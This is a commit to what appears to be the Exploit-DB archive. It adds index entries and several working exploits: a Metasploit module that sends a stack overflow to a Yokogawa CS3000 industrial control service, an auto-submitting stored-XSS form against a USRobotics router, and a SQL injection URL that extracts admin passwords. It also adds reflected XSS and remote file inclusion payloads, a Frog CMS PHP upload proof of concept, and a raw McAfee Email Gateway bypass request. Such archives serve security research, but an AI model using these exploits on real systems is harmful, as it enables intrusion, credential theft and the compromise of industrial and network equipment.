Updated 07_10_2014

2014-07-10 04:38:51 +00:00 · 2014-07-10 04:38:51 +00:00 · 2d0742415b
commit 2d0742415b
parent a4102ef337
12 changed files with 252 additions and 9 deletions
--- a/files.csv
+++ b/files.csv
@ -470,7 +470,7 @@ id,file,description,date,author,platform,type,port
 608,platforms/linux/remote/608.c,"WvTFTPd 0.9 - Remote Root Heap Overflow Exploit",2004-10-28,infamous41md,linux,remote,69
 609,platforms/linux/remote/609.txt,"zgv 5.5 - Multiple Arbitrary Code Execution PoC Exploits",2004-10-28,infamous41md,linux,remote,0
 611,platforms/windows/dos/611.c,"chesapeake tftp server 1.0 - Directory Traversal and DoS PoC exploit",2004-11-01,"Luigi Auriemma",windows,dos,0
-612,platforms/windows/remote/612.html,"MS Internet Explorer (IFRAME Tag) Buffer Overflow Exploit",2004-11-02,Skylined,windows,remote,0
+612,platforms/windows/remote/612.html,"MS Internet Explorer 6 - (IFRAME Tag) Buffer Overflow Exploit",2004-11-02,Skylined,windows,remote,0
 616,platforms/windows/remote/616.c,"MiniShare <= 1.4.1 - Remote Buffer Overflow Exploit",2004-11-07,class101,windows,remote,80
 618,platforms/windows/remote/618.c,"Ability Server 2.34 FTP STOR Buffer Overflow Exploit (Unix Exploit)",2004-11-07,NoPh0BiA,windows,remote,21
 619,platforms/windows/remote/619.c,"CCProxy Log Remote Stack Overflow Exploit",2004-11-09,Ruder,windows,remote,808
@ -10984,7 +10984,7 @@ id,file,description,date,author,platform,type,port
 12048,platforms/php/webapps/12048.html,"ttCMS 5.0 - Remote File Inclusion Vulnerability",2010-04-04,ITSecTeam,php,webapps,0
 12049,platforms/php/webapps/12049.html,"Uiga Proxy Remote File Inclusion Vulnerability",2010-04-04,ITSecTeam,php,webapps,0
 12050,platforms/php/webapps/12050.txt,"MassMirror Uploader Multiple RFI Exploit",2010-04-04,"cr4wl3r ",php,webapps,0
-12051,platforms/windows/local/12051.php,"PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit",2010-04-04,"Yakir Wizman",windows,local,0
+12051,platforms/windows/local/12051.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow Exploit (0Day)",2010-04-04,"Yakir Wizman",windows,local,0
 12052,platforms/php/webapps/12052.txt,"SAGU-PRO 1.0 - Multiple Remote File Include Vulnerability",2010-04-04,mat,php,webapps,0
 12053,platforms/windows/local/12053.py,"ZipCentral (.zip) SEH Exploit",2010-04-04,TecR0c,windows,local,0
 12054,platforms/php/webapps/12054.txt,"Joomla Component redSHOP Local File Inclusion Vulnerability&#9830;",2010-04-04,NoGe,php,webapps,0
@ -15739,7 +15739,7 @@ id,file,description,date,author,platform,type,port
 18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200 and 4300 Command Execution",2011-11-30,metasploit,hardware,remote,0
 18173,platforms/windows/dos/18173.pl,"Bugbear FlatOut 2005 Malformed .bed file Buffer Overflow Vulnerability",2011-11-30,Silent_Dream,windows,dos,0
 18174,platforms/windows/local/18174.py,"GOM Player 2.1.33.5071 ASX File Unicode Stack Buffer Overflow Exploit",2011-11-30,"Debasish Mandal",windows,local,0
-18176,platforms/windows/local/18176.py,"Windows Afd.sys - Privilege Escalation Exploit (MS11-080)",2011-11-30,ryujin,windows,local,0
+18176,platforms/windows/local/18176.py,"Windows XP/2003 Afd.sys - Local Privilege Escalation Exploit (MS11-080)",2011-11-30,ryujin,windows,local,0
 18177,platforms/php/webapps/18177.txt,"WikkaWiki <= 1.3.2 - Multiple Security Vulnerabilities",2011-11-30,EgiX,php,webapps,0
 18178,platforms/windows/local/18178.rb,"CCMPlayer 1.5 Stack based Buffer Overflow SEH Exploit (.m3u)",2011-11-30,Rh0,windows,local,0
 18179,platforms/jsp/remote/18179.html,"IBM Lotus Domino Server Controller Authentication Bypass Vulnerability",2011-11-30,"Alexey Sintsov",jsp,remote,0
@ -17652,7 +17652,7 @@ id,file,description,date,author,platform,type,port
 20353,platforms/windows/webapps/20353.py,"mailtraq 2.17.3.3150 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
 20354,platforms/php/remote/20354.rb,"PHP IRC Bot pbot eval() Remote Code Execution",2012-08-08,metasploit,php,remote,0
 20355,platforms/windows/remote/20355.rb,"Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential",2012-08-08,metasploit,windows,remote,0
-20356,platforms/windows/webapps/20356.py,"manageengine service desk plus 8.1 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
+20356,platforms/windows/webapps/20356.py,"ManageEngine Service Desk Plus 8.1 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
 20357,platforms/windows/webapps/20357.py,"alt-n mdaemon free 12.5.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
 20358,platforms/php/webapps/20358.py,"wordpress mini mail dashboard widget 1.42 - Stored XSS",2012-08-08,loneferret,php,webapps,0
 20359,platforms/windows/webapps/20359.py,"otrs open technology real services 3.1.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
@ -29308,7 +29308,7 @@ id,file,description,date,author,platform,type,port
 32565,platforms/multiple/remote/32565.txt,"Struts <= 2.0.11 Multiple Directory Traversal Vulnerabilities",2008-11-04,"Csaba Barta",multiple,remote,0
 32566,platforms/php/webapps/32566.txt,"firmCHANNEL Indoor & Outdoor Digital Signage 3.24 Cross Site Scripting Vulnerability",2008-11-04,"Brad Antoniewicz",php,webapps,0
 32567,platforms/php/webapps/32567.txt,"DHCart 3.84 Multiple Cross Site Scripting And HTML Injection Vulnerabilities",2008-11-04,Lostmon,php,webapps,0
-32568,platforms/windows/remote/32568.rb,"Fitnesse Wiki Remote Command Execution Vulnerability",2014-03-28,"SecPod Research",windows,remote,80
+32568,platforms/windows/remote/32568.rb,"Fitnesse Wiki - Remote Command Execution Vulnerability",2014-03-28,"SecPod Research",windows,remote,80
 32569,platforms/ios/webapps/32569.txt,"iStArtApp FileXChange 6.2 iOS - Multiple Vulnerabilities",2014-03-28,Vulnerability-Lab,ios,webapps,8888
 32570,platforms/php/webapps/32570.txt,"CuteNews aj-fork 'path' Parameter Remote File Include Vulnerability",2008-11-06,DeltahackingTEAM,php,webapps,0
 32571,platforms/php/webapps/32571.txt,"TurnkeyForms Software Directory 1.0 SQL Injection and Cross Site Scripting Vulnerabilities",2008-11-07,G4N0K,php,webapps,0
@ -30260,7 +30260,7 @@ id,file,description,date,author,platform,type,port
 33586,platforms/php/webapps/33586.txt,"Joomla! 'com_gambling' Component 'gamblingEvent' Parameter SQL Injection Vulnerability",2010-02-01,md.r00t,php,webapps,0
 33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel Wylecial",windows,dos,0
 33588,platforms/java/remote/33588.rb,"ElasticSearch Dynamic Script Arbitrary Java Execution",2014-05-30,metasploit,java,remote,9200
-33589,platforms/linux/local/33589.c,"Ubuntu 12.04.0-2LTS x64 perf_swevent_init - Kernel Local Root Exploit",2014-05-31,"Vitaly Nikolenko",linux,local,0
+33589,platforms/linux/local/33589.c,"Ubuntu 12.04.0-2LTS x64 - perf_swevent_init Kernel Local Root Exploit",2014-05-31,"Vitaly Nikolenko",linux,local,0
 33590,platforms/php/webapps/33590.txt,"Joomla! AutartiTarot Component Directory Traversal Vulnerability",2010-02-01,B-HUNT3|2,php,webapps,0
 33591,platforms/linux/dos/33591.sh,"lighttpd 1.4/1.5 Slow Request Handling Remote Denial Of Service Vulnerability",2010-02-02,"Li Ming",linux,dos,0
 33592,platforms/linux/dos/33592.txt,"Linux Kernel 2.6.x KVM 'pit_ioport_read()' Local Denial of Service Vulnerability",2010-02-02,"Marcelo Tosatti",linux,dos,0
@ -30605,6 +30605,7 @@ id,file,description,date,author,platform,type,port
 33980,platforms/windows/remote/33980.txt,"Best Way GEM Engine - Multiple Vulnerabilities",2009-10-12,"Luigi Auriemma",windows,remote,0
 33981,platforms/windows/remote/33981.txt,"GameCore 2.5 - 'GameID' Integer Overflow Vulnerability",2010-05-13,"Luigi Auriemma",windows,remote,0
 33982,platforms/php/webapps/33982.txt,"NPDS Revolution 10.02 'download.php' SQL Injection Vulnerability",2010-05-13,"High-Tech Bridge SA",php,webapps,0
+33983,platforms/php/webapps/33983.txt,"Frog CMS 0.9.5 - Arbitrary File Upload",2014-07-06,"Javid Hussain",php,webapps,0
 33984,platforms/hardware/webapps/33984.rb,"Netgear WNR1000v3 - Password Recovery Credential Disclosure Vulnerability",2014-07-07,c1ph04,hardware,webapps,0
 33985,platforms/php/webapps/33985.txt,"NPDS Revolution 10.02 'topic' Parameter Cross Site Scripting Vulnerability",2010-05-13,"High-Tech Bridge SA",php,webapps,0
 33986,platforms/php/webapps/33986.txt,"PHP File Uploader Remote File Upload Vulnerability",2010-01-03,indoushka,php,webapps,0
@ -30630,3 +30631,12 @@ id,file,description,date,author,platform,type,port
 34006,platforms/php/webapps/34006.txt,"Percha Gallery Component 1.6 Beta for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
 34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0
 34008,platforms/php/webapps/34008.txt,"Percha Multicategory Article Component 0.6 for Joomla! index.php controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
+34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow",2014-07-08,metasploit,windows,remote,20010
+34011,platforms/php/webapps/34011.txt,"Shopzilla Affiliate Script PHP 'search.php' Cross Site Scripting Vulnerability",2010-05-19,"Andrea Bocchetti",php,webapps,0
+34012,platforms/php/webapps/34012.txt,"Caucho Resin Professional 3.1.5 'resin-admin/digest.php' Multiple Cross Site Scripting Vulnerabilities",2010-05-19,xuanmumu,php,webapps,0
+34013,platforms/windows/remote/34013.txt,"McAfee Email Gateway 6.7.1 'systemWebAdminConfig.do' Remote Security Bypass Vulnerability",2010-05-19,"Nahuel Grisolia",windows,remote,0
+34014,platforms/php/webapps/34014.txt,"Web 2.0 Social Network Freunde Community System 'user.php' SQL Injection Vulnerability",2010-05-08,"Easy Laster",php,webapps,0
+34015,platforms/php/webapps/34015.txt,"SoftDirec 1.05 'delete_confirm.php' Cross Site Scripting Vulnerability",2010-05-19,indoushka,php,webapps,0
+34016,platforms/php/webapps/34016.txt,"Snipe Gallery 3.1 gallery.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0
+34017,platforms/php/webapps/34017.txt,"Snipe Gallery 3.1 image.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0
+34018,platforms/hardware/remote/34018.txt,"U.S.Robotics USR5463 0.06 Firmware setup_ddns.exe HTML Injection Vulnerability",2010-05-20,SH4V,hardware,remote,0
--- a/platforms/hardware/remote/34018.txt
+++ b/platforms/hardware/remote/34018.txt
@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/40292/info
+
+U.S.Robotics USR5463 firmware is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+U.S.Robotics firmware USR5463 0.06 is vulnerable. 
+
+<!--
+Author: SH4V
+BUG: permanent XSS
+Firmware: USR5463-v0_01.bin - USR5463-v0_06.bin
+Router: USR5463 802.11g Wireless Router
+Company: US Robotics
+Just change http://192.168.2.1/ by your current gateway.
+-->
+<form action="http://192.168.2.1/cgi-bin/setup_ddns.exe" method="post">
+<input type=hidden name="ddns_domainame" value=&#039;"><script>alert(1)</script>&#039;>
+<input type=hidden name="ddns_account" value=&#039;&#039;>
+<input type=password size=1 name="ddns_password" value=&#039;&#039;>
+</form>
+<script>document.forms[0].submit()</script>
--- a/platforms/php/webapps/33983.txt
+++ b/platforms/php/webapps/33983.txt
@ -0,0 +1,25 @@
+Exploit Title: Arbitrary File Upload in Frog CMS 0.9.5
+Date : 2014-07-07
+Exploit Author : Javid Hussain
+Vendor Homepage : http://www.madebyfrog.com
+
+# Exploit-DB Note: All authenticated users can upload files. If the file 
+# does not have execute permissions the CMS allows users to change them.
+# No need to be authenticated to trigger uploaded files.
+
+There is a possibility to upload arbitrary file in Frog CMS latest version
+0.9.5
+
+POC:
+
+The vulnerability exist because of the filemanager plugin is not properly
+verifying the extension of uploaded files.
+
+Go to     http://localhost/frog_095/admin/?/plugin/file_manager/images
+
+Upload an executable php file
+
+Go to     http://localhost/Frog/frog_095/public/images/
+
+for verification.
+
--- a/platforms/php/webapps/34011.txt
+++ b/platforms/php/webapps/34011.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/40246/info
+
+Shopzilla Affiliate Script PHP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/search.php?s=%3Cscript%3Ealert(/XSS/)%3C/script%3E 
--- a/platforms/php/webapps/34012.txt
+++ b/platforms/php/webapps/34012.txt
@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/40251/info
+
+Caucho Resin Professional is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Resin Professional 3.1.5 is affected; other versions may also be affected. 
+
+http://www.example.com/resin-admin/digest.php?digest_attempt=1&digest_realm="><script>alert("ZnVjayBjbnZk")</script><a&digest_username[]=
+http://www.example.com/resin-admin/digest.php?digest_attempt=1&digest_username="><script>alert("ZnVjayBjbnZk")</script><a
--- a/platforms/php/webapps/34014.txt
+++ b/platforms/php/webapps/34014.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/40264/info
+
+Web 2.0 Social Network Freunde Community System is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/cms/user.php?toDo=showgallery&id=999999999999+UNION+SELECT+1,concat(password,0x3a,id),3,4,5,6,7,8,9,10,11,12,13,14+from+admin 
--- a/platforms/php/webapps/34015.txt
+++ b/platforms/php/webapps/34015.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40269/info
+
+SoftDirec is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+SoftDirec 1.05 is vulnerable; other versions may also be affected.
+
+http://www.example.com/softdirec/library/delete_confirm.php?delete=yes&id=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&return=souk%20naamane&type=hacked%20by&catdel=indoushka
--- a/platforms/php/webapps/34016.txt
+++ b/platforms/php/webapps/34016.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40279/info
+
+Snipe Gallery is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
+
+The issues affect Snipe Gallery versions 3.1.5 and prior. 
+
+http://www.example.com/gallery.php?cfg_admin_path=[shell.txt ]
--- a/platforms/php/webapps/34017.txt
+++ b/platforms/php/webapps/34017.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40279/info
+ 
+Snipe Gallery is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
+ 
+The issues affect Snipe Gallery versions 3.1.5 and prior. 
+
+http://www.example.com/image.php?cfg_admin_path=[shell.txt ] 
--- a/platforms/windows/remote/34009.rb
+++ b/platforms/windows/remote/34009.rb
@ -0,0 +1,74 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Udp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow',
+      'Description'    => %q{
+        This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability
+        exists in the service BKFSim_vhfd.exe when using malicious user-controlled data to create
+        logs using functions like vsprintf and memcpy in a insecure way. This module has been
+        tested successfully on Yokogawa Centum CS3000 R3.08.50 over Windows XP SP3.
+      },
+      'Author'         =>
+        [
+          'Redsadic <julian.vilas[at]gmail.com>',
+          'juan vazquez'
+        ],
+      'References'     =>
+        [
+          ['CVE', '2014-3888'],
+          ['URL', 'http://jvn.jp/vu/JVNVU95045914/index.html'],
+          ['URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0002E.pdf'],
+          ['URL', 'https://community.rapid7.com/community/metasploit/blog/2014/07/07/r7-2014-06-disclosure-yokogawa-centum-cs-3000-bkfsimvhfdexe-buffer-overflow']
+        ],
+      'Payload'        =>
+        {
+          'Space'    => 1770, # 2228 (max packet length) - 16 (header) - (438 target['Offset']) - 4 (ret)
+          'DisableNops' => true,
+          'BadChars' => "\x00",
+          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3',
+            {
+              'Ret'    => 0x61e55c9c, # push esp | ret # LibBKCCommon.dll
+              'Offset' => 438
+            }
+          ],
+        ],
+      'DisclosureDate' => 'May 23 2014',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(20010)
+      ], self.class)
+  end
+
+  def exploit
+    connect_udp
+
+    sploit = "\x45\x54\x56\x48\x01\x01\x10\x09\x00\x00\x00\x01\x00\x00\x00\x44" # header
+    sploit << rand_text(target['Offset'])
+    sploit << [target.ret].pack("V")
+    sploit << payload.encoded
+
+    print_status("Trying target #{target.name}, sending #{sploit.length} bytes...")
+    udp_sock.put(sploit)
+
+    disconnect_udp
+  end
+
+end
--- a/platforms/windows/remote/34013.txt
+++ b/platforms/windows/remote/34013.txt
@ -0,0 +1,61 @@
+source: http://www.securityfocus.com/bid/40255/info
+
+McAfee Email Gateway is prone to a security-bypass vulnerability because the web-based interface fails to properly perform user-profile checks.
+
+Attackers can exploit this issue to bypass certain security restrictions to edit property and configuration settings.
+
+McAfee Email Gateway 6.7.1 is vulnerable; other versions may also be affected.
+
+POST /admin/systemWebAdminConfig.do?method=save&pageId=13&isMenuToggled=1 HTTP/1.1
+Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,
+application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/xaml+xml,
+application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*
+Referer:
+https://www.example.com:XXXXX/admin/systemWebAdminConfig.do?method=init&isMenuTog
+gled=1&pageId=13
+Accept-Language: es
+Content-Type: application/x-www-form-urlencoded
+UA-CPU: x86
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR
+3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
+Host: www.example.com:XXXXX
+Connection: Keep-Alive
+Cache-Control: no-cache
+Cookie:CTRGT=[YOUR COOKIE HERE]; CTSecureToken=[YOUR COOKIE HERE];
+tabbedMenuSelected=13;
+itemToHighlight=https%3A//www.example.com%3AXXXXX/admin/systemWebAdminConfig.do
+%3Fmethod%3Dinit%26isMenuToggled%3D1%26pageId%3D13;
+menusToExpand=ConfigurationMenu%2CCertificateManagementMenu%2CWebAdminConfiguration
+Menu%2C; JSESSIONID=[YOUR COOKIE HERE]
+Content-Length: 2650
+pageId=13&vipId=0&vipBased=0&rows%5B0%5D.attr_name=gui_log_level&rows%5B0%5D.attr_ty
+pe=12&rows%5B0%5D.attr_validate=30060003%3A1%2C30060004%3A4%2C30060005%3A5%2C
+30060006%3A6&rows%5B0%5D.attr_validate_str=30060003%3A1%2C30060004%3A4%2C300600
+05%3A5%2C30060006%3A6&rows%5B0%5D.attr_depends=&rows%5B0%5D.is_mult_val=0&rows
+%5B0%5D.lang_tag_id_dv=2000003.displayValue&rows%5B0%5D.is_ascii_only=0&rows%5B0%5
+D.proc_id=90&rows%5B0%5D.attr_value_clone=4&rows%5B0%5D.attr_value=4&rows%5B1%5D.a
+ttr_name=gui_timeout&rows%5B1%5D.attr_type=2&rows%5B1%5D.attr_validate=%5B1-
+30%5D&rows%5B1%5D.attr_validate_str=%5B1-
+30%5D&rows%5B1%5D.attr_depends=&rows%5B1%5D.is_mult_val=0&rows%5B1%5D.lang_tag_i
+d_dv=2001014.displayValue&rows%5B1%5D.is_ascii_only=0&rows%5B1%5D.proc_id=90&rows%5
+B1%5D.attr_value_clone=30&rows%5B1%5D.attr_value=30&rows%5B2%5D.attr_name=auto_refres
+h&rows%5B2%5D.attr_type=2&rows%5B2%5D.attr_validate=%5B1-
+30%5D&rows%5B2%5D.attr_validate_str=%5B1-
+30%5D&rows%5B2%5D.attr_depends=&rows%5B2%5D.is_mult_val=0&rows%5B2%5D.lang_tag_i
+d_dv=2001017.displayValue&rows%5B2%5D.is_ascii_only=0&rows%5B2%5D.proc_id=90&rows%5
+B2%5D.attr_value_clone=10&rows%5B2%5D.attr_value=10&rows%5B3%5D.attr_name=enable_logi
+n_disclaimer_text&rows%5B3%5D.attr_type=5&rows%5B3%5D.attr_validate=&rows%5B3%5D.attr
+_validate_str=&rows%5B3%5D.attr_depends=&rows%5B3%5D.is_mult_val=0&rows%5B3%5D.lang
+_tag_id_dv=2001044.displayValue&rows%5B3%5D.is_ascii_only=0&rows%5B3%5D.proc_id=90&r
+ows%5B3%5D.attr_value_clone=true&rows%5B3%5D.attr_value=true&rows%5B4%5D.attr_name=l
+ogin_disclaimer_text&rows%5B4%5D.attr_type=19&rows%5B4%5D.attr_validate=&rows%5B4%5D
+.attr_validate_str=&rows%5B4%5D.attr_depends=enable_login_disclaimer_text&rows%5B4%5D.is_
+mult_val=0&rows%5B4%5D.lang_tag_id_dv=2001045.displayValue&rows%5B4%5D.is_ascii_only=
+0&rows%5B4%5D.proc_id=90&rows%5B4%5D.attr_value_clone=****************************
+***************************%0D%0A%22NEW
+DISCLAIMER.%22%0D%0A*******************************************************&ro
+ws%5B4%5D.attr_value=*******************************************************%0D%0
+A%22NEW
+DISCLAIMER.%22%0D%0A*******************************************************&su
+bmitValue=Submit
--- a/platforms/windows/remote/612.html
+++ b/platforms/windows/remote/612.html
@ -63,6 +63,6 @@ ________________________________________________________________________________
  -->
  <IFRAME SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB NAME="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC&#3341;&#3341;"></IFRAME>
 </HTML>
-
-
-// milw0rm.com [2004-11-02]
+
+
+// milw0rm.com [2004-11-02]